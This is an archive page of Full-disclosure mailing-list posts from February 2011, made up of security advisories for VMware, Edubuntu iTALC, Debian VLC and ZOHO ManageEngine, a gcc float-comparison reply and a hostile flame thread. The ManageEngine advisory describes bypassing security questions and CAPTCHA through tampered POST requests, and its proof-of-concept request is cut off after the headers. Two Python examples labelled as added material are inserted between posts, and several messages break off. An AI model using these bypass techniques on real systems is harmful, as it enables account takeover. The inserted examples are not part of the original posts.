[Full-disclosure] VMSA-2011-0003 Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX

2011-02-10 Thread VMware Security team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- 
   VMware Security Advisory

Advisory ID:   VMSA-2011-0003
Synopsis:  Third party component updates for VMware vCenter
   Server, vCenter Update Manager, ESXi and ESX
Issue date:2011-02-10
Updated on:2011-02-10 (initial release of advisory)
CVE numbers:   --- Apache Tomcat ---
   CVE-2009-2693 CVE-2009-2901 CVE-2009-2902
   CVE-2009-3548 CVE-2010-2227 CVE-2010-1157
   --- Apache Tomcat Manager ---
   CVE-2010-2928
   --- cURL ---
   CVE-2010-0734
   --- COS Kernel ---
   CVE-2010-1084 CVE-2010-2066 CVE-2010-2070
   CVE-2010-2226 CVE-2010-2248 CVE-2010-2521
   CVE-2010-2524 CVE-2010-0008 CVE-2010-0415
   CVE-2010-0437 CVE-2009-4308 CVE-2010-0003
   CVE-2010-0007 CVE-2010-0307 CVE-2010-1086
   CVE-2010-0410 CVE-2010-0730 CVE-2010-1085
   CVE-2010-0291 CVE-2010-0622 CVE-2010-1087
   CVE-2010-1173 CVE-2010-1437 CVE-2010-1088
   CVE-2010-1187 CVE-2010-1436 CVE-2010-1641
   CVE-2010-3081
   --- Microsoft SQL Express ---
   CVE-2008-5416 CVE-2008-0085 CVE-2008-0086
   CVE-2008-0107 CVE-2008-0106
   --- OpenSSL ---
   CVE-2010-0740 CVE-2010-0433
   CVE-2010-3864 CVE-2010-2939
   --- Oracle (Sun) JRE ---
   CVE-2009-3555 CVE-2010-0082 CVE-2010-0084
   CVE-2010-0085 CVE-2010-0087 CVE-2010-0088
   CVE-2010-0089 CVE-2010-0090 CVE-2010-0091
   CVE-2010-0092 CVE-2010-0093 CVE-2010-0094
   CVE-2010-0095 CVE-2010-0837 CVE-2010-0838
   CVE-2010-0839 CVE-2010-0840 CVE-2010-0841
   CVE-2010-0842 CVE-2010-0843 CVE-2010-0844
   CVE-2010-0845 CVE-2010-0846 CVE-2010-0847
   CVE-2010-0848 CVE-2010-0849 CVE-2010-0850
   CVE-2010-0886 CVE-2010-3556 CVE-2010-3566
   CVE-2010-3567 CVE-2010-3550 CVE-2010-3561
   CVE-2010-3573 CVE-2010-3565 CVE-2010-3568
   CVE-2010-3569 CVE-2010-1321 CVE-2010-3548
   CVE-2010-3551 CVE-2010-3562 CVE-2010-3571
   CVE-2010-3554 CVE-2010-3559 CVE-2010-3572
   CVE-2010-3553 CVE-2010-3549 CVE-2010-3557
   CVE-2010-3541 CVE-2010-3574
   --- pam_krb5 ---
   CVE-2008-3825 CVE-2009-1384
- 

1. Summary

   Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere
   Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues.


2. Relevant releases

   vCenter Server 4.1 without Update 1,

   vCenter Update Manager 4.1 without Update 1,

   ESXi 4.1 without patch ESXi410-201101201-SG,

   ESX 4.1 without patch ESX410-201101201-SG.


3. Problem Description

 a. vCenter Server and vCenter Update Manager update Microsoft
SQL Server 2005 Express Edition to Service Pack 3

Microsoft SQL Server 2005 Express Edition (SQL Express)
distributed with vCenter Server 4.1 Update 1 and vCenter Update
Manager 4.1 Update 1 is upgraded from SQL Express Service Pack 2
to SQL Express Service Pack 3, to address multiple security
issues that exist in the earlier releases of Microsoft SQL Express.

Customers using other database solutions need not update for
these issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
Express Service Pack 3.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware          Product   Running   Replace with/
Product         Version   on        Apply Patch
==============  ========  ========  ==========================
vCenter         4.1       Windows   Update 1
vCenter         4.0       Windows   affected, patch pending
VirtualCenter   2.5       Windows   affected, no patch planned

Update Manager  4.1       Windows   Update 1
Update Manager  4.0       Windows   affected, patch pending
Update Manager  1.0       Windows   affected, no patch planned

hosted *        any       any       not affected

ESXi            any       ESXi      not affected

ESX             any       ESX       not affected

  * Hosted products are VMware Workstation, Player, ACE, Fusion.

 b. vCenter Apache Tomcat Management Application Credential Disclosure

The Apache Tom

[Full-disclosure] KeySoft (BrailleNote Apex) 9.1 Fixes Gaping Security Hole

2011-02-10 Thread Sabahattin Gucukoglu
From the release notes:

> Password protected login
> BrailleNote Apex can be password protected.  In case you forget your 
> password, you can contact our Technical Support services to obtain a password 
> unlock file. User identification and device serial number will be required. 
> For security purposes, ActiveSync is disabled at this stage.)
> 
> Improved security
> Access to communication protocols has been protected to prevent unwanted 
> access to file system. When password protection is activated, ActiveSync is 
> disabled. 
> 

I'll leave the reader to draw his/her own conclusions concerning the "Password 
protected login" feature, pausing only to doubt its usefulness in protecting my 
data when it doesn't use any encryption, but it's nice to know they've 
*finally* addressed the telnet/FTP problem.  And just in time for a shiny new 
release, too.  I'll be the most handsome web surfer at the local cafe.

Cheers,
Sabahattin

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [USN-1061-1] iTALC vulnerability

2011-02-10 Thread Kees Cook
===
Ubuntu Security Notice USN-1061-1 February 11, 2011
italc vulnerability
CVE-2011-0724
===

A security issue affects the following Edubuntu releases:

Edubuntu 9.10
Edubuntu 10.04 LTS
Edubuntu 10.10

This advisory does not apply to the corresponding versions of
Ubuntu, Kubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Edubuntu 9.10:
  italc-client                    1:1.0.9.1-0ubuntu16.1

Edubuntu 10.04 LTS:
  italc-client                    1:1.0.9.1-0ubuntu18.10.04.1

Edubuntu 10.10:
  italc-client                    1:1.0.9.1-0ubuntu18.10.10.1

After a standard system update, if you had originally installed from
the Edubuntu Live DVD and the bad keys were found, you will need to
redistribute the newly generated public keys to your iTALC clients and
restart each session. For more details, see:
https://wiki.ubuntu.com/iTalc/Keys

Details follow:

Stéphane Graber discovered that the iTALC private keys shipped with the
Edubuntu Live DVD were not correctly regenerated once Edubuntu was
installed. If an iTALC client was installed with the vulnerable keys, a
remote attacker could gain control of the system. Only systems using keys
from the Edubuntu Live DVD were affected.


Updated packages for Edubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc_1.0.9.1-0ubuntu16.1.diff.gz
  Size/MD5:    16671 1463aaba5c51b8cec0d60b95f748604e

http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc_1.0.9.1-0ubuntu16.1.dsc
  Size/MD5: 1920 08011f20c0f1ef67bc9585cb1e7b1afd

http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc_1.0.9.1.orig.tar.gz
  Size/MD5:  3294206 5acc6bd10139bc3e05e7106d27410e46

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_amd64.deb
  Size/MD5:   542156 64fb51a7bc9f270430816c26d9975087

http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_amd64.deb
  Size/MD5:  1104570 3ec712ffb519e2d435049fef207fd2c6

http://security.ubuntu.com/ubuntu/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_amd64.deb
  Size/MD5:   203938 2f304ef75066085440e3d212a8b369cb

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_i386.deb
  Size/MD5:   511854 8a7275b9a5d0bd04c72f3eb9ca1b331d

http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_i386.deb
  Size/MD5:  1107262 d7cfffe6dac606775375e924a30e26f3

http://security.ubuntu.com/ubuntu/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_i386.deb
  Size/MD5:   205602 2cf1ef5e65abe30128c079c3f1449384

  armel architecture (ARM Architecture):


http://ports.ubuntu.com/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_armel.deb
  Size/MD5:   538896 eb7379ae546c8536ca02c89e2bca4ef8

http://ports.ubuntu.com/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_armel.deb
  Size/MD5:  1091678 5b7b38132f58ecc7888c1c1f2be2ec69

http://ports.ubuntu.com/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_armel.deb
  Size/MD5:   193496 3c34296c12cf3196c4461c5fb466e26d

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_lpia.deb
  Size/MD5:   517964 58315714b8f7ac8947d10c006e2338b7

http://ports.ubuntu.com/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_lpia.deb
  Size/MD5:  1112450 1e07a33fd32a2b39e2f98247fea1fd91

http://ports.ubuntu.com/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_lpia.deb
  Size/MD5:   207090 a8de2ff7e3a63d7941c907c6f7662327

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_powerpc.deb
  Size/MD5:   509256 6d3ab8b223c052daf61505e3699c548c

http://ports.ubuntu.com/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_powerpc.deb
  Size/MD5:  1104256 a60f8f7864eaccd3925ed159f9922a52

http://ports.ubuntu.com/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_powerpc.deb
  Size/MD5:   207212 3f17a9133c795d574afbcaab646c0a6a

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_sparc.deb
  Size/MD5:   535652 3b4d443d9c446be018420f8d24660ec7

http://ports.ubuntu.com/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_sparc.deb
  Size/MD5:  1113496 a69b5373083c72ae1f7fee5a8ec1ad2d

http://ports.ubuntu.com/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_sparc.deb
  Size/MD5:   199270 1d46750c6fdb042ebbc3fc8da0b87cc3

Updated packages for Edubuntu 10.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/universe/i/italc/italc

Re: [Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]

2011-02-10 Thread Valdis . Kletnieks
On Thu, 10 Feb 2011 11:39:57 EST, Leon Kaiser said:

> "Yay open source"?
> 
> http://gcc.gnu.org/bugzilla/show_bug.cgi?id=323

From comment #2 on that bug:

State-Changed-Why: See any faq on numerical analysis that mentions the x86.
You are seeing the results of excess precision in the FPU.
Either change the rounding precision in the FPCR, or work
around the problem with -ffloat-store.

Let's look at the problematic line in the sample code:

if (y != y2) printf("error\n");

This will cause the printf to trigger if the two numbers are bitwise identical
down to the last bit.  If y and y2 were computed via different code paths, and
thus hit different patterns of rounding and truncation, they could easily be
different in the last bit or two (for example, 3.993428883437 and
3.993428883436).  It's been well understood since literally the 1950s that if
you're trying to do any serious floating-point computation, such comparisons
should usually be written as 'if (abs(y - y2) < epsilon)' for whatever value of
epsilon you're willing to accept as a fuzz factor.

Although it's probably possible to "fix" gcc to do the right thing for the test
case in the bug report, it's in general *not* possible to "fix" this in the
general case.  It just becomes a total mess of little special corner cases and
makes performance of both the optimizer and the generated code totally tank.

There's only a limited amount of things the compiler and optimizer can do to
save a programmer from improper numeric analysis.

For further details, read comment 109 and/or the paper referenced in
comment 96.  Many of the other comments are also relevant.



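As an added example (not from Valdis's message or the gcc bug report), here is the tolerance comparison he describes, written in Python rather than C. Python floats are the platform's C doubles, so the rounding behaviour carries over, though the x87 excess-precision effect itself is not reproduced here. It goes slightly beyond the post: the fuzz factor is a combined relative-and-absolute epsilon, because an absolute epsilon alone is useless at large magnitudes (adjacent doubles near 1e16 are 2.0 apart) and a relative epsilon alone is useless near zero, and it shows the standard library's `math.isclose` as the equivalent. The values compared are constructed for the demo.

```python
import math


def exact_equal(y: float, y2: float) -> bool:
    """The test from the bug report: bit-for-bit equality of two doubles."""
    return y == y2


def approx_equal(y: float, y2: float,
                 rel_eps: float = 1e-9, abs_eps: float = 1e-12) -> bool:
    """Tolerance ('fuzz factor') comparison, |y - y2| < epsilon in spirit.

    abs_eps covers values near zero, where a relative bound shrinks to nothing;
    rel_eps scales with magnitude, which matters because the spacing between
    adjacent doubles grows with the value (near 1e16 it is already 2.0).
    """
    diff = abs(y - y2)
    if diff <= abs_eps:
        return True
    return diff <= rel_eps * max(abs(y), abs(y2))


def sum_tenths(n: int) -> float:
    """Second code path to the value n/10: accumulate 0.1 n times, picking up
    a rounding error on each addition since 0.1 is not exactly representable."""
    acc = 0.0
    for _ in range(n):
        acc += 0.1
    return acc


def compare_paths(n: int) -> dict:
    """Compare n/10 computed two ways, under each comparison rule."""
    y, y2 = sum_tenths(n), n / 10
    return {
        "values": (y, y2),
        "exact": exact_equal(y, y2),
        "approx": approx_equal(y, y2),
        # Standard-library equivalent of approx_equal's rule.
        "stdlib": math.isclose(y, y2, rel_tol=1e-9, abs_tol=1e-12),
    }
```

Running `compare_paths(10)` shows the two code paths landing on 0.9999999999999999 and 1.0: the exact test reports them as different, the tolerance tests as equal. Pick epsilons from the precision the computation actually needs, not from what makes a particular test pass.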

[Full-disclosure] CORE-2011-0103 - ZOHO ManageEngine ADSelfService multiple vulnerabilities

2011-02-10 Thread CORE Security Technologies Advisories
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

ZOHO ManageEngine ADSelfService multiple vulnerabilities


1. *Advisory Information*

Title: ZOHO ManageEngine ADSelfService multiple vulnerabilities
Advisory ID: CORE-2011-0103
Advisory URL:
http://www.coresecurity.com/content/zoho-manageengine-vulnerabilities
Date published: 2011-02-10
Date of last update: 2011-02-10
Vendors contacted: ZOHO Corporation
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Protection Mechanism Failure [CWE-693], Authentication Issues
[CWE-287], Cross-Site Scripting (XSS) [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2010-3272, CVE-2010-3273, CVE-2010-3274


3. *Vulnerability Description*

ManageEngine ADSelfService Plus [1] is a secure, web-based, end-user
password reset management program. This software helps domain users to
perform self-service password reset, self-service account unlock and
employee self-update of personal details (e.g. telephone numbers) in
Microsoft Windows Active Directory. Administrators find it easy to
automate password resets and account unlocks while managing and
optimizing the expenses associated with helpdesk calls.

The security question mechanism used for password recovery can be
weakened by tampering with the HTTP POST request containing the answers,
allowing an attacker to pass the security check by guessing just one of
the security answers. Additionally, the CAPTCHA mechanism can be
bypassed in the same manner, enabling the automation of the guessing
attempts.

The security question mechanism can also be bypassed by changing the
flow of the application: skipping the security question step and
sending the HTTP request that performs the password change immediately
after declaring which user is to run the recovery procedure.

Additionally, two cross site scripting vulnerabilities were found
related to search functions.


4. *Vulnerable packages*

   . ManageEngine ADSelfService Plus 4.4.
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . ManageEngine ADSelfService Plus 4.5 Build 4500 and above.


6. *Vendor Information, Solutions and Workarounds*

Core would like to thank Manikandan.T [2] for giving us the following
detailed information about the way the Zoho team has addressed the
security vulnerabilities highlighted in this document.


6.1. *Solution to the Weak security question mechanism*

[CVE-2010-3272] In addition to the Security Questions, the latest
version of ADSelfService Plus also includes an SMS Verification / Email
Verification mechanism. This adds a further layer of security to the
password reset. Users must confirm the code sent to their mobile phones /
email when they are to reset passwords / unlock accounts.

The earlier builds used a URL-based POST request flow, which was
considered vulnerable. This has been replaced by a more secure Tokenizer
mechanism. This mechanism prevents "by-passing any process / steps
involved in password reset / account unlock". The Tokenizer mechanism
mandates that every step is processed only in the defined sequence. This
implies that the "Hide_Captcha / quesList" fields cannot be altered; if
they are, the request no longer follows the desired sequence.


6.2. *Solution to the Security question bypass*

[CVE-2010-3273] Earlier versions of ADSelfService Plus checked the
validation only at the page where the user was present. Now each and
every step, and also the previous steps, are validated. The
"Tokenizer Method" ensures that no steps are bypassed. It also ensures
that validation occurs at every level and only in the desired
sequence.


6.3. *Solution to Cross site scripting vulnerabilities*

[CVE-2010-3274] Security Filters are used to prevent Cross Site
Scripting vulnerabilities. ADSelfService Plus now checks every input
provided by a user on all pages, including the "Password Reset / Unlock
Account" and Employee Search pages.


7. *Credits*

This vulnerability was discovered and researched by Ernesto Alvarez from
Core Security Technologies. The publication of this advisory was
coordinated by Fernando Miranda from Core Security Advisories team.


8. *Technical Description / Proof of Concept Code*

8.1. *Weak security question mechanism*

[CVE-2010-3272] The procedure to recover a lost password involves the
user answering a series of security questions set during enrollment.
After the recovery request and user ID have been sent, the system
requires the user to answer a certain number of security questions,
whose answers are then sent using a POST request, as seen below.

/-
POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1

Host: SERVER
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13)
Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,de
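As an added example, not part of the Core advisory and not ADSelfService Plus code, here is a server-side step-sequencing check of the kind section 6 describes: the server, not the client, decides which questions were issued, requires all of them to be answered, and refuses a password change whose session has not passed the question step. The user record, questions, salt, token format and step names are all constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed enrollment data for a hypothetical user. Answers are stored as
# salted SHA-256 digests (demo salt; use a per-user random salt for real).
SALT = b"demo-salt-not-for-production"


def _digest(answer: str) -> bytes:
    """Normalise case and surrounding whitespace, then hash with the salt."""
    return hashlib.sha256(SALT + answer.strip().lower().encode()).digest()


ENROLLED = {
    "alice": {
        "q1": ("First pet?", _digest("rex")),
        "q2": ("Birth city?", _digest("lisbon")),
        "q3": ("Favourite colour?", _digest("green")),
    }
}


class FlowError(Exception):
    """A request arrived out of sequence or with tampered fields."""


class PasswordResetFlow:
    """Server-side state machine: identify -> questions -> reset.

    Each step consults the server-held session record, never client-supplied
    fields, so shrinking the question list or jumping straight to the final
    step cannot shortcut the sequence.
    """

    REQUIRED_ANSWERS = 2  # questions the server issues per attempt
    MAX_ATTEMPTS = 3      # failed answer rounds before the session is closed

    def __init__(self):
        self._sessions = {}

    def start(self, user: str) -> str:
        """Step 1: the server picks the questions and binds them to a token."""
        if user not in ENROLLED:
            raise FlowError("unknown user")
        issued = sorted(ENROLLED[user])[: self.REQUIRED_ANSWERS]
        token = secrets.token_hex(16)
        self._sessions[token] = {"user": user, "step": "questions",
                                 "issued": issued, "attempts": 0}
        return token

    def submit_answers(self, token: str, answers: dict) -> None:
        """Step 2: the answer set must equal the issued set, all correct.
        Results are collected before being combined, so a wrong first answer
        does not short-circuit the remaining comparisons."""
        s = self._session(token, expected="questions")
        if set(answers) != set(s["issued"]):
            raise FlowError("answer set does not match the issued questions")
        record = ENROLLED[s["user"]]
        results = [hmac.compare_digest(_digest(answers[q]), record[q][1])
                   for q in s["issued"]]
        if not all(results):
            s["attempts"] += 1
            if s["attempts"] >= self.MAX_ATTEMPTS:
                del self._sessions[token]
                raise FlowError("too many failed attempts; session closed")
            raise FlowError("one or more answers incorrect")
        s["step"] = "reset"

    def reset_password(self, token: str, new_password: str) -> str:
        """Step 3: only reachable after step 2 succeeded for this token; the
        token is consumed so it cannot be replayed. The directory write of
        new_password is omitted here; the user name is returned instead."""
        s = self._session(token, expected="reset")
        del self._sessions[token]
        return s["user"]

    def _session(self, token: str, expected: str) -> dict:
        s = self._sessions.get(token)
        if s is None:
            raise FlowError("unknown or expired token")
        if s["step"] != expected:
            raise FlowError(f"out of sequence: at '{s['step']}', got '{expected}'")
        return s


def demo() -> dict:
    """Exercise the flows the advisory describes and report each outcome."""
    flow, out = PasswordResetFlow(), {}

    def attempt(label, action):
        try:
            out[label] = action() or "accepted"
        except FlowError:
            out[label] = "rejected"

    t1 = flow.start("alice")  # tampered POST: answer only one question
    attempt("partial_answers", lambda: flow.submit_answers(t1, {"q1": "rex"}))
    t2 = flow.start("alice")  # skip the questions entirely
    attempt("skip_questions", lambda: flow.reset_password(t2, "N3w-Passw0rd"))
    t3 = flow.start("alice")  # legitimate sequence, then a replay attempt
    flow.submit_answers(t3, {"q1": "Rex ", "q2": "Lisbon"})
    attempt("legitimate", lambda: flow.reset_password(t3, "N3w-Passw0rd"))
    attempt("replay", lambda: flow.reset_password(t3, "again"))
    return out
```

The point of the design is that the token carries no client-editable state: which questions were asked, how many answers are required and which step comes next all live in the server's session record, so fields like the advisory's "quesList" have nothing to alter. A CAPTCHA or SMS/email code would be added as a further step in the same state machine rather than as a client-side flag.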

[Full-disclosure] [SECURITY] [DSA 2159-1] vlc security update

2011-02-10 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -
Debian Security Advisory DSA-2159-1                     secur...@debian.org
http://www.debian.org/security/                          Moritz Muehlenhoff
February 10, 2011                        http://www.debian.org/security/faq
- -

Package: vlc
Vulnerability  : missing input sanitising
Problem type   : (local)remote
Debian-specific: no
CVE ID : CVE-2011-0531

Dan Rosenberg discovered that insufficient input validation in VLC's 
processing of Matroska/WebM containers could lead to the execution of 
arbitrary code. 

For the stable distribution (squeeze), this problem has been fixed in
version 1.1.3-1squeeze3.

The version of vlc in the oldstable distribution (lenny) is affected
by further issues and will be addressed in a followup DSA.

For the unstable distribution (sid), this problem has been fixed in
version 1.1.7-1.

We recommend that you upgrade your vlc packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk1UayYACgkQXm3vHE4uylos6QCeLCU9ynXRns3mmNXdLlUHJcB3
WMwAoMHS56Fvdn4AZYoaoAGulzacvtV1
=ZweI
-----END PGP SIGNATURE-----



Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread James Rankin
Nettie (and that isn't a term of endearment - see
http://en.wiktionary.org/wiki/nettie)

Please bog off. You make me ashamed to be British. Anyone with a burgeoning
consultancy would shut the hell up about it, not bawl about it on FD.

I have to say that your trolling is first-class though. I am an FD lurker,
not a contributor, yet you have wound me up enough to respond. For that,
well done.

Now sod off. I am only a short train ride from your neck of the woods, and I
would love to kick your ass for plaguing my inbox again.

Adios,

On 10 February 2011 16:32, andrew.wallace wrote:

> Thankfully you are very rarely involved with public and private sector
> business talks in the UK, so the situation will probably never arise we are
> in the same board room.
>
> Stay in America and keep away from the UK is the best thing that could ever
> happen to you, because frankly meeting you would be a complete nightmare for
> me and I would find it hard to work with you on any meaningful level.
>
> One thing for sure is you have pissed me off with the way you speak to me
> via private email and your perceived perception of who I am, and what you
> think n3td3v is.
>
> Maybe in the beginning it seemed like disorganised non-sense to you, but it
> has evolved and shaped over the years with me and is now a serious force to
> be reckoned with and is able to compete with other consultancy orgainsations
> in the UK, now that there are serious consultants on board from the business
> and government sector in the UK, where we work on meaningful policy reform
> within organisations, to tighten security against foreign powers, terrorist
> attacks and other matters.
>
> To be perfectly honest, I would like to say, I think you've been reading
> mailing lists too much, a lot more goes on in industry than the stupid
> disclosure community, work actually gets done that is meaningful and
> satisfying when I come home at night.
>
> My advice to you is, stop reading mailing lists, get on with the physical
> industry and stop basing your views of people based on back and forward
> horse play people have have had between 2004-2009.
>
> That part of n3td3v is behind you, me and everyone, I removed the mailing
> list as a symbolic gesture to move on from that.
>
> I'm now a professional, consulting and liaising with other consultants in
> the UK in the public and private sector through the consortium, the
> consultants who ive had dealings with in the physical domain who have
> decided to join through knowing me in a working relationship.
>
> The organisation is nothing to do with what it might have been, n3td3v is
> rethought and matured, along with me.
>
> You couldn't possibly say the same orgainsation I started when I was 18 is
> going to be the same orgainsation today now that I'm 30, it isn't.
>
> I've changed, we've changed, the type of people I come into contact has
> changed through opportunities I've gained in the physical domain.
>
> n3td3v is very much nothing to do with anything online-based, but has
> shifted into the physical domain, in that, its people I actually know who I
> can shake hands with who are members.
>
> That is why the name was changed, the brand, its now a consortium, its
> nothing to do with online or some silly Google group mailing list.
>
> The beginning days of n3td3v between 2004-2009 and the Google group mailing
> list was used to pushed my name out into the industry to become known, you
> should be able to work with me in a meaningful working relationship if you
> ever had to through work commitments.
>
> Everyone else who I meet in the physical domain knows who I am, but they
> don't judge me for it, they shake my hand and move on with the problems in
> the industry that are needing solved.
>
> They don't say, that's Andrew who used to post in the disclosure community,
> let's huff and puff about it.
>
> They take me as I am in the physical domain, realise it was silly horse
> play from the past and move on.
>
> I hope you are able to do the same, because your attitude just annoys me
> that you cannot have a mature and professional approach in the way you talk
> with me.
>
> Andrew
>
>


-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have a

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread David Klein
And where can I register a public domain?

Regards,

David Klein
IP Focus

From: Christian Sciberras [mailto:uuf6...@gmail.com] 
Sent: Friday, February 11, 2011 4:39 AM
To: andrew.wallace
Cc: valdis.kletni...@vt.edu; Georgi Guninski; huj huj huj;
"david.kl...@ipfocus.com.au"; "kz2...@googlemail.com"; mcass...@gmail.com;
"full-disclosure@lists.grok.org.uk"
Subject: Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

 

One question. Who's "you" that you keep referring to all the time?





On Thu, Feb 10, 2011 at 5:44 PM, andrew.wallace
 wrote:

Thankfully you are very rarely involved with public and private sector
business talks in the UK, so the situation will probably never arise we are
in the same board room.

Stay in America and keep away from the UK is the best thing that could ever
happen to you, because frankly meeting you would be a complete nightmare for
me and I would find it hard to work with you on any meaningful level.

One thing for sure is you have pissed me off with the way you speak to me
via private email and your perceived perception of who I am, and what you
think n3td3v is.

Maybe in the beginning it seemed like disorganised non-sense to you, but it
has evolved and shaped over the years with me and is now a serious force to
be reckoned with and is able to compete with other consultancy orgainsations
in the UK, now that there are serious consultants on board from the business
and government sector in the UK, where we work on meaningful policy reform
within organisations, to tighten security against foreign powers, terrorist
attacks and other matters.

To be perfectly honest, I would like to say, I think you've been reading
mailing lists too much, a lot more goes on in industry than the stupid
disclosure community, work actually gets done that is meaningful and
satisfying when I come home at night.

My advice to you is, stop reading mailing lists, get on with the physical
industry and stop basing your views of people based on back and forward
horse play people have have had between 2004-2009.

That part of n3td3v is behind you, me and everyone, I removed the mailing
list as a symbolic gesture to move on from that.

I'm now a professional, consulting and liaising with other consultants in
the UK in the public and private sector through the consortium, the
consultants who ive had dealings with in the physical domain who have
decided to join through knowing me in a working relationship.

The organisation is nothing to do with what it might have been, n3td3v is
rethought and matured, along with me.

You couldn't possibly say the same orgainsation I started when I was 18 is
going to be the same orgainsation today now that I'm 30, it isn't.

I've changed, we've changed, the type of people I come into contact has
changed through opportunities I've gained in the physical domain.

n3td3v is very much nothing to do with anything online-based, but has
shifted into the physical domain, in that, its people I actually know who I
can shake hands with who are members.

That is why the name was changed, the brand, its now a consortium, its
nothing to do with online or some silly Google group mailing list.

The beginning days of n3td3v between 2004-2009 and the Google group mailing
list was used to push my name out into the industry to become known, you
should be able to work with me in a meaningful working relationship if you
ever had to through work commitments.



Everyone else who I meet in the physical domain knows who I am, but they
don't judge me for it, they shake my hand and move on with the problems in
the industry that are needing solved.

They don't say, that's Andrew who used to post in the disclosure community,
let's huff and puff about it.

They take me as I am in the physical domain, realise it was silly horse play
from the past and move on.

I hope you are able to do the same, because your attitude just annoys me
that you cannot have a mature and professional approach in the way you talk
with me.

Andrew

 

 


[Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]

2011-02-10 Thread Leon Kaiser
From: Leon Kaiser 
Reply-to: litera...@gnaa.eu
To: Cal Leeming [Simplicity Media Ltd]

Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
Date: Wed, 09 Feb 2011 19:15:36 -0500

Years, if I'm not mistaken.


Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
   http://gnaa.eu || http://security.goatse.fr
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer
 



> On Wed, 2011-02-09 at 20:00 +, Cal Leeming [Simplicity Media Ltd]
> wrote:
> 
> > Christian, this issue has been 'floating' around for several months
> > now.
> > 
> > On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras
> >  wrote:
> > 
> > Ah, been reading more about it, seems it was fixed.
> > 
> > Still, there should have been safeguards around this - I'm
> > thinking they should check existing conversion routines to
> > ensure they're safe...
> > 
> > 
> > 
> > 
> > 
> > On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras
> >  wrote:
> > 
> > Was it fixed? What's the current status?
> > 
> > The sounds like a major issue, and the lack of info
> > about it is darn impressive.
> > 
> > 
> > I tried it on my test Windows WAMP server:
> > 
> > <?php
> > ob_implicit_flush(true);
> > 
